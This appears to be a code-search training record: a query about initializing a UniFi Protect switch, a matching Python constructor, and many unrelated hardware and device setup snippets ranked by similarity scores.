self.__interface.send_data(0x28)\n\n self.__interface.send_command('POWER_ON')\n self.wait_until_idle()\n\n self.__interface.send_command('PLL_CONTROL')\n self.__interface.send_data(0x3c)\n\n self.__interface.send_command('TEMPERATURE_CALIBRATION')\n self.__interface.send_data(0x00)\n\n self.__interface.send_command('VCOM_AND_DATA_INTERVAL_SETTING')\n self.__interface.send_data(0x77)\n\n self.__interface.send_command('TCON_SETTING')\n self.__interface.send_data(0x22)\n\n self.__interface.send_command('TCON_RESOLUTION')\n self.__interface.send_data(0x02) #source 640\n self.__interface.send_data(0x80)\n self.__interface.send_data(0x01) #gate 384\n self.__interface.send_data(0x80)\n\n self.__interface.send_command('VCM_DC_SETTING')\n self.__interface.send_data(0x1E) #decide by LUT file\n\n self.__interface.send_command(0xe5, False) #FLASH MODE\n self.__interface.send_data(0x03)", "def __init__(self, mb_info, switch_config):\n self.microblaze = Arduino(mb_info, ARDUINO_MAILBOX_PROGRAM)\n self.iop_switch_config = switch_config", "def switch_setup(params, rig, ik_joints):\n\n # Duplicate for bind skeleton\n skeleton = [x.name() for x in params['ikSkeleton']]\n bind_skeleton = cmds.duplicate(skeleton, n=skeleton[0] + '_bnd_0')\n #bind_skeleton\n\n # Hide all attribute on Controller\n fkikcontrol = params['fkIkSwitch'].name()\n attrs = ['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v']\n for i in attrs:\n cmds.setAttr('{node}.{attr}'.format(node=fkikcontrol, attr=i), k=False, cb=False)\n\n # Create FK/IK Switch attributes\n cmds.addAttr(fkikcontrol, sn='FKIKBlend', at='float', min=0, max=1, dv=0, k=True)\n cmds.addAttr(fkikcontrol, sn='AutoVis', at='bool', dv=1, k=True)\n cmds.addAttr(fkikcontrol, ln='FKVis', at='bool', dv=1, k=True)\n cmds.addAttr(fkikcontrol, ln='IKVis', at='bool', dv=1, k=True)\n\n # create control offset transforms\n # par = cmds.listRelatives(fkikcontrol, parent=True)\n # buf = create_offset_transform(fkikcontrol, BUF)\n # cmds.parent(fkikcontrol, buf)\n # if par: cmds.parent(buf, par[0])\n\n # Parent Skeleton to rig group\n ik_skeleton = [x.name() for x in params['ikSkeleton']]\n fk_skeleton = [x.name() for x in params['fkSkeleton']]\n cmds.parent(ik_skeleton[0], rig['rigGroup'])\n cmds.parent(fk_skeleton[0], rig['rigGroup'])\n\n # Constraint Bind Skeleton\n fk_ik_finish(ik_joints, bind_skeleton, params)", "def setUp(self):\n self.frequency = 250\n self.firmware = 30474\n self.mask = lmdm.ListModeDataMask(self.frequency, self.firmware)", "def __init__(__self__, *,\n enable_integrity_monitoring: Optional[pulumi.Input[bool]] = None,\n enable_secure_boot: Optional[pulumi.Input[bool]] = None):\n if enable_integrity_monitoring is not None:\n pulumi.set(__self__, \"enable_integrity_monitoring\", enable_integrity_monitoring)\n if enable_secure_boot is not None:\n pulumi.set(__self__, \"enable_secure_boot\", enable_secure_boot)", "def __init__(self, _BurnProb=0.3):\n _snap.TUndirFFire_swiginit(self, _snap.new_TUndirFFire(_BurnProb))", "def __init__(self):\r\n self.activation = Activation(u'signup')\r\n self.activated = False", "def __init__(self, pin =0):\n\t\tself.uv_sensor = pin\n\t\tgrovepi.pinMode(self.uv_sensor, \"INPUT\")", "def __init__(self):\n _hypre.HypreILU_swiginit(self, _hypre.new_HypreILU())", "async def async_turn_off(self, **kwargs):\n if self._switch_type == \"ir_mode\":\n _LOGGER.debug(\"Turning off IR\")\n await self.upv.set_camera_ir(self._camera_id, self._ir_off_cmd)\n elif self._switch_type == \"status_light\":\n _LOGGER.debug(\"Changing Status Light to Off\")\n await self.upv.set_camera_status_light(self._camera_id, False)\n elif self._switch_type == \"hdr_mode\":\n _LOGGER.debug(\"Turning off HDR mode\")\n await self.upv.set_camera_hdr_mode(self._camera_id, False)\n elif self._switch_type == \"high_fps\":\n _LOGGER.debug(\"Turning off High FPS mode\")\n await self.upv.set_camera_video_mode_highfps(self._camera_id, False)\n else:\n _LOGGER.debug(\"Turning off Recording\")\n await self.upv.set_camera_recording(self._camera_id, TYPE_RECORD_NEVER)\n await self.protect_data.async_refresh(force_camera_update=True)", "def _use_existing_configuration(self):\n HW_Init(self.ftdi, None)", "def setUp(self):\n self.portal = self.layer['portal']\n self.installer = get_installer(self.portal)", "def setup(self):\n \n # Board refers to the P1 header of the Raspberry Pi board\n GPIO.setmode(GPIO.BOARD)\n\n # Set up pin as an input with a pull up resistor to 3.3V\n GPIO.setup(self.__pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)", "async def async_setup_entry(\n hass: HomeAssistantType, entry: ConfigEntry, async_add_entities\n) -> None:\n entry_data = hass.data[DOMAIN][entry.entry_id]\n upv_object = entry_data[\"upv\"]\n protect_data = entry_data[\"protect_data\"]\n if not protect_data.data:\n return\n\n sensors = []\n for sensor in SENSOR_TYPES:\n for camera in protect_data.data:\n sensors.append(UnifiProtectSensor(upv_object, protect_data, camera, sensor))\n _LOGGER.debug(\"UNIFIPROTECT SENSOR CREATED: %s\", sensor)\n\n async_add_entities(sensors)\n\n return True", "def t0_switch_config_helper(test_obj: 'T0TestBase'):\n configer = SwitchConfiger(test_obj)\n test_obj.dut.switch_id = configer.start_switch()", "def do_security_setup(run_as_user, branch, base_path, dist_path, enable=True):\n \n if not enable:\n #disable security setup if enabled\n runcmd(\"apt-get -y remove unattended-upgrades fail2ban psad rkhunter chkrootkit logwatch apparmor auditd iwatch\")\n return\n \n #modify host.conf\n modify_config(r'^nospoof on$', 'nospoof on', '/etc/host.conf')\n \n #enable automatic security updates\n runcmd(\"apt-get -y install unattended-upgrades\")\n runcmd('''bash -c \"echo -e 'APT::Periodic::Update-Package-Lists \"1\";\\nAPT::Periodic::Unattended-Upgrade \"1\";' > /etc/apt/apt.conf.d/20auto-upgrades\" ''')\n runcmd(\"dpkg-reconfigure -fnoninteractive -plow unattended-upgrades\")\n \n #sysctl\n runcmd(\"install -m 0644 -o root -g root -D %s/linux/other/sysctl_rules.conf /etc/sysctl.d/60-tweaks.conf\" % dist_path)\n\n #set up fail2ban\n runcmd(\"apt-get -y install fail2ban\")\n runcmd(\"install -m 0644 -o root -g root -D %s/linux/other/fail2ban.jail.conf /etc/fail2ban/jail.d/counterblock.conf\" % dist_path)\n runcmd(\"service fail2ban restart\")\n \n #set up psad\n runcmd(\"apt-get -y install psad\")\n modify_config(r'^ENABLE_AUTO_IDS\\s+?N;$', 'ENABLE_AUTO_IDS\\tY;', '/etc/psad/psad.conf')\n modify_config(r'^ENABLE_AUTO_IDS_EMAILS\\s+?Y;$', 'ENABLE_AUTO_IDS_EMAILS\\tN;', '/etc/psad/psad.conf')\n for f in ['/etc/ufw/before.rules', '/etc/ufw/before6.rules']:\n modify_config(r'^# End required lines.*?# allow all on loopback$',\n '# End required lines\\n\\n#CUSTOM: for psad\\n-A INPUT -j LOG\\n-A FORWARD -j LOG\\n\\n# allow all on loopback',\n f, dotall=True)\n runcmd(\"psad -R && psad --sig-update\")\n runcmd(\"service ufw restart\")\n runcmd(\"service psad restart\")\n \n #set up chkrootkit, rkhunter\n runcmd(\"apt-get -y install rkhunter chkrootkit\")\n runcmd('bash -c \"rkhunter --update; exit 0\"')\n runcmd(\"rkhunter --propupd\")\n runcmd('bash -c \"rkhunter --check --sk; exit 0\"')\n runcmd(\"rkhunter --propupd\")\n \n #logwatch\n runcmd(\"apt-get -y install logwatch libdate-manip-perl\")\n \n #apparmor\n runcmd(\"apt-get -y install apparmor apparmor-profiles\")\n \n #auditd\n #note that auditd will need a reboot to fully apply the rules, due to it operating in \"immutable mode\" by default\n runcmd(\"apt-get -y install auditd audispd-plugins\")\n runcmd(\"install -m 0640 -o root -g root -D %s/linux/other/audit.rules /etc/audit/rules.d/counterblock.rules\" % dist_path)\n modify_config(r'^USE_AUGENRULES=.*?$', 'USE_AUGENRULES=\"yes\"', '/etc/default/auditd')\n runcmd(\"service auditd restart\")\n\n #iwatch\n runcmd(\"apt-get -y install iwatch\")\n modify_config(r'^START_DAEMON=.*?$', 'START_DAEMON=true', '/etc/default/iwatch')\n runcmd(\"install -m 0644 -o root -g root -D %s/linux/other/iwatch.xml /etc/iwatch/iwatch.xml\" % dist_path)\n modify_config(r'guard email=\"root@localhost\"', 'guard email=\"noreply@%s\"' % socket.gethostname(), '/etc/iwatch/iwatch.xml')\n runcmd(\"service iwatch restart\")", "def __init__(\n self,\n data: ProtectData,\n device: ProtectAdoptableDeviceModel,\n description: ProtectSwitchEntityDescription,\n ) -> None:\n super().__init__(data, device, description)\n self._attr_name = f\"{self.device.display_name} {self.entity_description.name}\"\n self._switch_type = self.entity_description.key", "def __init__(self, arest, resource, name, pin):\n self.arest = arest\n self._resource = resource\n self._name = name\n self._pin = pin\n self.update()\n\n if self._pin is not None:\n request = requests.get('{}/mode/{}/i'.format\n (self._resource, self._pin), timeout=10)\n if request.status_code is not 200:\n _LOGGER.error(\"Can't set mode. Is device offline?\")", "def setup(self):\n self.scp = None", "def __init__(self, id: Union[int, str], /, mode: int = Pin.IN, pull: int = Pin.PULL_UP, af: Union[str, int] = -1, invert: bool = False):", "def setup_pin(self, pin, dutycycle, frequency=2000):\n raise NotImplementedError", "async def async_turn_off(self, **kwargs: Any) -> None:\n\n await self.entity_description.ufp_set(self.device, False)", "async def async_turn_off(self, **kwargs: Any) -> None:\n\n await self.entity_description.ufp_set(self.device, False)", "def SPIsetup(self):\n self.writecmd(0x01,0x10,0,self.data); #SPI/SETUP", "def __init__(self, dev):\n self.dev = dev\n self.dev.cla = 0x80", "def SetAutoDetectUi(Ui):\n SPI.DeviceList[\"spi_rpi_ui\"]= Ui \n I2C.DeviceList[\"i2c_rpi_ui\"]= Ui", "def __init__(__self__, *,\n auth: Optional[pulumi.Input['IstioConfigAuth']] = None,\n disabled: Optional[pulumi.Input[bool]] = None):\n if auth is not None:\n pulumi.set(__self__, \"auth\", auth)\n if disabled is not None:\n pulumi.set(__self__, \"disabled\", disabled)", "def setup(self):\n\n self._enable_torque(self._reg.TORQUE_ENABLE)\n self.change_operating_mode(self._reg.MODE_EXT_POSI)\n # set to max velocity\n self.change_veloity(self._default_velocity)", "def firewallOff():\n pass", "def __init__(self, pin_obj: Pin, invert: bool = False):", "def setup(self):\n # if not system.restore_snapshot():\n # self.log.debug(\"No snapshot to restore, if this is not expected please contact automation team\")\n crindsim.set_mode(\"manual\")\n pos.connect()\n pos.sign_on()", "def __init__(self, bus: object):\r\n\r\n self.state_NF = False\r\n self.state_NT = False\r\n self.state_VE4_open = False\r\n self.state_VE4_close = False\r\n self.state_comand_open_VE4 = False\r\n self.state_comand_close_VE4 = False\r\n self.state_throttling = False\r\n self.state_heat = False\r\n self.state_rotation = False\r\n self.state_chmb_open = False\r\n self.back_door_close = False\r\n self.phase_electric = False\r\n self.turbine_break = False\r\n\r\n self.mes_current = 0\r\n self.mes_speed = 0\r\n self.mes_temperature = 0\r\n\r\n self.seted_throttling = 0\r\n self.seted_cur_heat = 0\r\n self.seted_rot_speed = 0\r\n\r\n self.bus = bus\r\n self.msg_send_upr = can.Message(\r\n arbitration_id=self.id_blockRasp_command,\r\n is_extended_id=True,\r\n dlc=4,\r\n data=bytearray(4),\r\n )", "def boot(self):\n\n pass", "def startup( self ):\n # ---- Setup UPNPC ----\n if self.config.neuron.use_upnpc:\n bittensor.logging.success(prefix = 'Set upnpc', sufix = '<green>ON</green>')\n try:\n self.external_port = net.upnpc_create_port_map( port = self.axon.port )\n except net.UPNPCException as upnpc_exception:\n logger.critical('Failed to hole-punch with upnpc')\n raise RuntimeError('Failed to hole-punch with upnpc')\n else:\n bittensor.logging.success(prefix = 'Set upnpc', sufix = '<red>OFF</red>')\n self.external_port = self.config.axon.port\n\n # ---- Get external ip ----\n try:\n self.external_ip = net.get_external_ip()\n bittensor.logging.success(prefix = 'External IP', sufix = '<blue>{}</blue>'.format(self.external_ip))\n except net.ExternalIPNotFound as external_port_exception:\n raise RuntimeError('Unable to attain your external ip. Check your internet connection. error:{}', external_port_exception)\n\n # ---- Setup tensorboard ----\n if self.config.neuron.use_tensorboard == True:\n self._tensorboard_program = program.TensorBoard()\n self._tensorboard_program.configure(argv=[None, '--logdir', self.config.neuron.full_path, '--load_fast=true'])\n self._tensorbaord_url = self._tensorboard_program.launch()\n bittensor.logging.success(prefix = 'Set tensorboard', sufix = '<blue>http://localhost:6006/</blue>')\n else: bittensor.logging.success(prefix = 'Set tensorboard', sufix = '<red>OFF</red>')\n\n # ---- Setup Wallet. ----\n if not self.wallet.has_coldkeypub:\n self.wallet.create_new_coldkey( n_words = 12, use_password = True )\n if not self.wallet.has_coldkeypub:\n raise RuntimeError('Miner must have access to a decrypted coldkeypub')\n if not self.wallet.has_hotkey:\n self.wallet.create_new_hotkey( n_words = 12, use_password = False )\n if not self.wallet.has_hotkey:\n raise RuntimeError('Miner must have access to a decrypted hotkey')\n\n # ---- Subscribe to chain ----\n subscribe_success = self.subtensor.subscribe(\n wallet = self.wallet,\n ip = self.external_ip,\n port = self.external_port,\n modality = bittensor.proto.Modality.TEXT,\n wait_for_finalization = True,\n timeout = 4 * bittensor.__blocktime__,\n )\n if not subscribe_success:\n raise RuntimeError('Failed to subscribe neuron.')\n\n # ---- Starting axon ----\n self.axon.start()", "def __init__(self):\n GPIO.setmode(GPIO.BOARD) # Set's GPIO referencing to RPi Board Refdes\n self.chanlist = [29, 31, 33, 35, 37] # chanlist 0, 1, 2, 3, 4\n GPIO.setup(29, GPIO.IN) # Setup as input to pi\n GPIO.setup(31, GPIO.IN) # Setup as input\n GPIO.setup(33, GPIO.IN) # Setup as input\n GPIO.setup(35, GPIO.IN) # Setup as input\n GPIO.setup(37, GPIO.OUT) # Setup as output from pi\n self.SHTDWN = False\n\n GPIO.add_event_detect(self.chanlist[1], GPIO.BOTH) \n GPIO.add_event_detect(self.chanlist[3], GPIO.FALLING, self.callback_SHTDWN, bouncetime=200)", "def turn_aux_heat_on(self):\n self._device.set_mode(self._device.MODE_HEAT_EMERGENCY)\n self._device.set_fan(self._device.FAN_AUTO)", "def turn_off(self, **kwargs):\n _LOGGER.error(\"DALI TURN OFF\")\n self._state = False\n\n url = self.urlx + '/toggle'\n headers = {'x-ha-access': 'raspberry',\n 'content-type': 'application/json'}\n\n response = get(url, headers=headers)\n _LOGGER.error(response.text)\n\n json_data = json.loads(response.text)\n _LOGGER.error(json_data)\n\n state = json_data['state']\n\n self._dimmer = 0\n\n self._state = state == 'on'", "def bootup(debug_port, lines):\n lines.skip_until(\"Booting...\")\n lines.skip_until(\"Loading blocks...\")\n lines.skip_until(\"Starting user space\")\n authenticate(debug_port, lines)\n lines.expect_next(\"Enter command\")", "async def unlight(self) -> None:\n self.lit = False\n await self.run_command(\"miner fault_light off\")\n print(\"unlight\" + self.ip)", "def _force_off(self):\n self._interface.set('fw_wp_vref', self._fw_wp_vref)\n self._interface.set('fw_wp_en', 'on')\n self._interface.set('fw_wp', 'off')", "def turn_off(self, **kwargs: Any) -> None:\n if (\n DPCODE_LIGHT in self.tuya_device.status\n and DPCODE_SWITCH not in self.tuya_device.status\n ):\n commands = [{\"code\": DPCODE_LIGHT, \"value\": False}]\n else:\n commands = [{\"code\": DPCODE_SWITCH, \"value\": False}]\n self._send_command(commands)", "def _on_switch_activate(\n self, entity: Union[str, dict], attribute: str, old: str, new: str, kwargs: dict\n ) -> None:\n self.log(\"No one home; not allowing switch to activate\")\n\n self.toggle(state=\"off\")", "def Elevate(self):\n self.Send(self.EncryptString('elevate\\n'))\n print self.DecryptString(self.Recv(4096))\n\n self.Send(self.EncryptString(self.flag_2))\n print self.DecryptString(self.Recv(4096))\n\n self.Send(self.EncryptString('RocketDonkey\\n'))\n print self.DecryptString(self.Recv(4096))", "def affection_status_switch_on(self):\n self._affection_status_switch = False", "def __init__(self, hdw=['Soundcard'], devicename='dev1'):\n self.debugFlag = False\n self.task = None # NI Task\n self.required_hardware = hdw # Require specific hardware \n self.hardware = [] # list of hardware actually found on this system\n self.find_hardware(device_info={'devicename': devicename}) # population the self.hardware list", "def __init__(self):\n self.cad = pifacecad.PiFaceCAD()\n self.listener = pifacecad.SwitchEventListener(chip=self.cad)\n for i in range(8):\n self.listener.register(i, pifacecad.IODIR_FALLING_EDGE, self.press_key)\n self.listener.activate()\n atexit.register(self.atexit)", "def unconfigure_enable_password(device,secret=True,privilege=None):\n cmd=\"no enable\"\n if secret :\n cmd+=\" secret\"\n else :\n cmd+=\" password\"\n if privilege :\n cmd+=f\" level {privilege}\"\n\n try:\n device.configure(cmd)\n except SubCommandFailure as e:\n raise SubCommandFailure(\n f'Could not unconfigure enable password or secret:\\n{e}'\n )", "def test_lswitch_uninstall(self):\n self._common_uninstall_delete(\n 'id', lswitch.delete,\n {'switch': {}},\n ['logicalSwitch'], {\n 'uri_parameters': {'virtualWireID': 'id'}\n },\n additional_params=['vsphere_network_id']\n )", "def _init_io(self):\n GPIO.setwarnings(False)\n GPIO.setmode( GPIO.BCM )\n pins = [ self._spi_dc ]\n for pin in pins:\n GPIO.setup( pin, GPIO.OUT )", "def __init__(self):\n i2c.Pn532_i2c.__init__(self)\n self._uid = False", "def setUp(self):\n self.platform = wirelesstagpy.WirelessTags(username=USERNAME, password=PASSWORD)\n self.tag_outdoor = wirelesstagpy.SensorTag(MOCK.OUTDOOR_PROBE, self.platform)\n self.platform._tags[\"fake-1\"] = self.tag_outdoor # pylint: disable=protected-access", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def __init__(self,address,InUseBy=None,Bus = None,Ident=''):\n self.Ident = Ident\n self.InUseBy = InUseBy\n VersionStrip =Ident.split(' ')[0].lower()\n if Ident !='' and VersionStrip in SPI.DeviceList:\n self.InUseBy = SPI.DeviceList[VersionStrip](Bus,address)\n else:\n self.Type=None\n if self.InUseBy!=None:\n self.Ident=VersionStrip", "async def test_setup_multiple(\n hass: HomeAssistant,\n ufp: MockUFPFixture,\n bootstrap: Bootstrap,\n) -> None:\n\n await hass.config_entries.async_setup(ufp.entry.entry_id)\n await hass.async_block_till_done()\n\n assert ufp.entry.state == ConfigEntryState.LOADED\n assert ufp.api.update.called\n assert ufp.entry.unique_id == ufp.api.bootstrap.nvr.mac\n\n nvr = bootstrap.nvr\n nvr._api = ufp.api\n nvr.mac = \"A1E00C826983\"\n nvr.id\n ufp.api.get_nvr = AsyncMock(return_value=nvr)\n\n with patch(\n \"homeassistant.components.unifiprotect.utils.ProtectApiClient\"\n ) as mock_api:\n mock_config = MockConfigEntry(\n domain=DOMAIN,\n data={\n \"host\": \"1.1.1.1\",\n \"username\": \"test-username\",\n \"password\": \"test-password\",\n \"id\": \"UnifiProtect\",\n \"port\": 443,\n \"verify_ssl\": False,\n },\n version=2,\n )\n mock_config.add_to_hass(hass)\n\n mock_api.return_value = ufp.api\n\n await hass.config_entries.async_setup(mock_config.entry_id)\n await hass.async_block_till_done()\n\n assert mock_config.state == ConfigEntryState.LOADED\n assert ufp.api.update.called\n assert mock_config.unique_id == ufp.api.bootstrap.nvr.mac", "def configure_switch(self, config):\n raise NotImplementedError" ]
[ "0.681985", "0.6236986", "0.60262203", "0.5953998", "0.574082", "0.5638578", "0.55229837", "0.5518489", "0.54835725", "0.53193676", "0.5306003", "0.529105", "0.5281412", "0.5253174", "0.5229308", "0.5203549", "0.5202759", "0.5167008", "0.51573527", "0.5147676", "0.5139711", "0.513108", "0.50843513", "0.5074334", "0.5072397", "0.50535524", "0.5033775", "0.5024384", "0.50232697", "0.501238", "0.5008296", "0.49974683", "0.49968866", "0.49935144", "0.49925593", "0.49886662", "0.49865025", "0.4980608", "0.49697623", "0.4962449", "0.49572477", "0.49549457", "0.49361503", "0.49301746", "0.49281558", "0.4925834", "0.49021757", "0.48983914", "0.48780498", "0.4874267", "0.48696592", "0.4869301", "0.48555192", "0.48451394", "0.48408186", "0.48190427", "0.48184213", "0.48184213", "0.48133814", "0.48059958", "0.47910488", "0.47904304", "0.47895175", "0.4787378", "0.47865155", "0.47861037", "0.47818443", "0.47812495", "0.47763056", "0.477412", "0.47634065", "0.47627178", "0.4762613", "0.47625306", "0.47568935", "0.47483024", "0.47432733", "0.4740015", "0.47377184", "0.47291654", "0.47278363", "0.47247654", "0.47214818", "0.47169715", "0.47164887", "0.4715152", "0.47062826", "0.47062826", "0.47062826", "0.47062826", "0.47062826", "0.47062826", "0.47062826", "0.47062826", "0.47062826", "0.47062826", "0.47062826", "0.47049633", "0.47046044", "0.46967322" ]
0.5260423
13
Initialize an Unifi Protect Switch.
def __init__(self, coordinator, upv, camera, switch_type, ir_on, ir_off): self.coordinator = coordinator self.upv = upv self._camera_id = camera self._camera = self.coordinator.data[camera] self._name = "{0} {1} {2}".format( DOMAIN.capitalize(), SWITCH_TYPES[switch_type][0], self._camera["name"] ) self._unique_id = self._name.lower().replace(" ", "_") self._icon = "mdi:{}".format(SWITCH_TYPES.get(switch_type)[1]) self._ir_on_cmd = ir_on self._ir_off_cmd = ir_off self._camera_type = self._camera["type"] self._attr = SWITCH_TYPES.get(switch_type)[2] self._switch_type = SWITCH_TYPES.get(switch_type)[2] _LOGGER.debug("UnifiProtectSwitch: %s created", self._name) _LOGGER.debug( "UnifiProtectSwitch: IR_ON %s IR_OFF %s", self._ir_on_cmd, self._ir_off_cmd )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, data, camera, switch_type):\n self.data = data\n self._camera_id = camera\n self._camera = self.data.devices[camera]\n self._name = \"{0} {1} {2}\".format(DOMAIN.capitalize(), SWITCH_TYPES[switch_type][0], self._camera[\"name\"])\n self._unique_id = self._name.lower().replace(\" \", \"_\")\n self._icon = \"mdi:{}\".format(SWITCH_TYPES.get(switch_type)[1])\n self._state = STATE_OFF\n self._camera_type = self._camera[\"type\"]\n self._attr = SWITCH_TYPES.get(switch_type)[2]\n _LOGGER.debug(\"UnifiProtectSwitch: %s created\", self._name)", "def __init__(\n self, upv_object, protect_data, server_info, camera_id, switch, ir_on, ir_off\n ):\n super().__init__(upv_object, protect_data, server_info, camera_id, switch)\n self.upv = upv_object\n switch_type = SWITCH_TYPES[switch]\n self._name = f\"{switch_type[_SWITCH_NAME]} {self._camera_data['name']}\"\n self._icon = f\"mdi:{switch_type[_SWITCH_ICON]}\"\n self._ir_on_cmd = ir_on\n self._ir_off_cmd = ir_off\n self._switch_type = switch_type[_SWITCH_TYPE]", "def init(self):\n self.connect_to_switches()\n self.reset_states()", "def __init__(self, name, device, sensor_type, nvrdata):\n self._name = name\n self._unique_id = self._name.lower().replace(\" \", \"_\")\n self._device = device\n self._sensor_type = sensor_type\n self._nvrdata = nvrdata\n self._icon = \"mdi:{}\".format(SENSOR_TYPES.get(self._sensor_type)[2])\n self._state = device[\"recording_mode\"]\n self._camera_type = device[\"type\"]\n self._attr = SENSOR_TYPES.get(self._sensor_type)[3]\n _LOGGER.debug(\"UnifiProtectSensor: %s created\", self._name)", "def __init__(self):\n _hypre.HypreILU_swiginit(self, _hypre.new_HypreILU())", "def __init__(self):\n\n GPIO.setup(PIN_BTN, GPIO.IN, GPIO.PUD_UP)\n GPIO.setup(PIN_RED_LED_0, GPIO.OUT, GPIO.LOW)\n GPIO.setup(PIN_BLUE_LED, GPIO.OUT, GPIO.LOW)", "def __init__(self):\n GPIO.setwarnings(False)\n GPIO.cleanup() # Reset the high and low levels of the GPIO port\n #The following code defines the GPIO used to control the L298N chip. This definition is different for different Raspberry Pi driver boards.\n self.Motor_A_EN = 17\n self.Motor_B_EN = 4\n self.Motor_A_Pin1 = 27\n self.Motor_A_Pin2 = 18\n self.Motor_B_Pin1 = 21\n self.Motor_B_Pin2 = 26\n self.setup()", "def __init__(self, pin =0):\n\t\tself.uv_sensor = pin\n\t\tgrovepi.pinMode(self.uv_sensor, \"INPUT\")", "def __init__(self):\n i2c.Pn532_i2c.__init__(self)\n self._uid = False", "def __init__(self, arest, resource, name, pin):\n self.arest = arest\n self._resource = resource\n self._name = name\n self._pin = pin\n self.update()\n\n if self._pin is not None:\n request = requests.get('{}/mode/{}/i'.format\n (self._resource, self._pin), timeout=10)\n if request.status_code is not 200:\n _LOGGER.error(\"Can't set mode. Is device offline?\")", "def initialize_heating_pin(pi, pin):\n pi.set_pull_up_down(pin, pigpio.PUD_DOWN)", "def __init__(self, _BurnProb=0.3):\n _snap.TUndirFFire_swiginit(self, _snap.new_TUndirFFire(_BurnProb))", "def __init__(__self__, *,\n enable_integrity_monitoring: Optional[pulumi.Input[bool]] = None,\n enable_secure_boot: Optional[pulumi.Input[bool]] = None):\n if enable_integrity_monitoring is not None:\n pulumi.set(__self__, \"enable_integrity_monitoring\", enable_integrity_monitoring)\n if enable_secure_boot is not None:\n pulumi.set(__self__, \"enable_secure_boot\", enable_secure_boot)", "def __init__(self):\n self.cad = pifacecad.PiFaceCAD()\n self.listener = pifacecad.SwitchEventListener(chip=self.cad)\n for i in range(8):\n self.listener.register(i, pifacecad.IODIR_FALLING_EDGE, self.press_key)\n self.listener.activate()\n atexit.register(self.atexit)", "def __init__(self, dev):\n self.dev = dev\n self.dev.cla = 0x80", "def __init__(self, pin_obj: Pin, invert: bool = False):", "def __init__(self, id: Union[int, str], /, mode: int = Pin.IN, pull: int = Pin.PULL_UP, af: Union[str, int] = -1, invert: bool = False):", "def __init__(self):\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(pin,GPIO.OUT)", "def __init__(__self__, *,\n auth: Optional[pulumi.Input['IstioConfigAuth']] = None,\n disabled: Optional[pulumi.Input[bool]] = None):\n if auth is not None:\n pulumi.set(__self__, \"auth\", auth)\n if disabled is not None:\n pulumi.set(__self__, \"disabled\", disabled)", "def __init__(self, input_pin: int) -> None:\n # Instansieer de afstand sensor pin.\n self._afstandsensor_input_pin = input_pin\n GPIO.setup(self._afstandsensor_input_pin, GPIO.IN,\n pull_up_down=GPIO.PUD_UP)\n\n # Zet fake opgepakt op false.\n self._fake_opgepakt = False", "def __init__(self, mb_info, switch_config):\n self.microblaze = Arduino(mb_info, ARDUINO_MAILBOX_PROGRAM)\n self.iop_switch_config = switch_config", "def init(self):\n self.reset()\n\n self.__interface.send_command('POWER_SETTING')\n self.__interface.send_data(0x37)\n self.__interface.send_data(0x00)\n\n self.__interface.send_command('PANEL_SETTING')\n self.__interface.send_data(0xCF)\n self.__interface.send_data(0x08)\n\n self.__interface.send_command('BOOSTER_SOFT_START')\n self.__interface.send_data(0xc7)\n self.__interface.send_data(0xcc)\n self.__interface.send_data(0x28)\n\n self.__interface.send_command('POWER_ON')\n self.wait_until_idle()\n\n self.__interface.send_command('PLL_CONTROL')\n self.__interface.send_data(0x3c)\n\n self.__interface.send_command('TEMPERATURE_CALIBRATION')\n self.__interface.send_data(0x00)\n\n self.__interface.send_command('VCOM_AND_DATA_INTERVAL_SETTING')\n self.__interface.send_data(0x77)\n\n self.__interface.send_command('TCON_SETTING')\n self.__interface.send_data(0x22)\n\n self.__interface.send_command('TCON_RESOLUTION')\n self.__interface.send_data(0x02) #source 640\n self.__interface.send_data(0x80)\n self.__interface.send_data(0x01) #gate 384\n self.__interface.send_data(0x80)\n\n self.__interface.send_command('VCM_DC_SETTING')\n self.__interface.send_data(0x1E) #decide by LUT file\n\n self.__interface.send_command(0xe5, False) #FLASH MODE\n self.__interface.send_data(0x03)", "def __init__(self, device_label):\n self._device_label = device_label\n self._state = None\n self._digits = hub.config.get(CONF_CODE_DIGITS)\n self._changed_by = None\n self._change_timestamp = 0\n self._default_lock_code = hub.config.get(CONF_DEFAULT_LOCK_CODE)", "def __init__(self, user, server, port=80, model='motorized'):\n import pigpio\n self.user = user\n self.server, self.port = server, port\n self.model = model\n self.serial = self.get_serial()\n self.lock_id = self.get_lock_id()\n self.pi = pigpio.pi()\n self.avail_actions = {\n 'unlock': 600,\n 'lock': 2400,\n }", "def __init__(\n self,\n switch_type: str,\n switch_name: str,\n tm_client: TransmissionClient,\n client_name: str,\n ) -> None:\n self._attr_name = switch_name\n self.type = switch_type\n self._tm_client = tm_client\n self._state = STATE_OFF\n self._data = None\n self.unsub_update: Callable[[], None] | None = None\n self._attr_unique_id = f\"{tm_client.config_entry.entry_id}-{switch_type}\"\n self._attr_device_info = DeviceInfo(\n entry_type=DeviceEntryType.SERVICE,\n identifiers={(DOMAIN, tm_client.config_entry.entry_id)},\n manufacturer=\"Transmission\",\n name=client_name,\n )", "def _init_hardware(self):\n return", "def __init__(self):\n GPIO.setmode(GPIO.BOARD) # Set's GPIO referencing to RPi Board Refdes\n self.chanlist = [29, 31, 33, 35, 37] # chanlist 0, 1, 2, 3, 4\n GPIO.setup(29, GPIO.IN) # Setup as input to pi\n GPIO.setup(31, GPIO.IN) # Setup as input\n GPIO.setup(33, GPIO.IN) # Setup as input\n GPIO.setup(35, GPIO.IN) # Setup as input\n GPIO.setup(37, GPIO.OUT) # Setup as output from pi\n self.SHTDWN = False\n\n GPIO.add_event_detect(self.chanlist[1], GPIO.BOTH) \n GPIO.add_event_detect(self.chanlist[3], GPIO.FALLING, self.callback_SHTDWN, bouncetime=200)", "def __init__(self,address,InUseBy=None,Bus = None,Ident=''):\n self.Ident = Ident\n self.InUseBy = InUseBy\n VersionStrip =Ident.split(' ')[0].lower()\n if Ident !='' and VersionStrip in SPI.DeviceList:\n self.InUseBy = SPI.DeviceList[VersionStrip](Bus,address)\n else:\n self.Type=None\n if self.InUseBy!=None:\n self.Ident=VersionStrip", "def init(self):\n self.l_motor = lazytalonsrx.LazyTalonSRX(Constants.IL_MOTOR_ID)\n 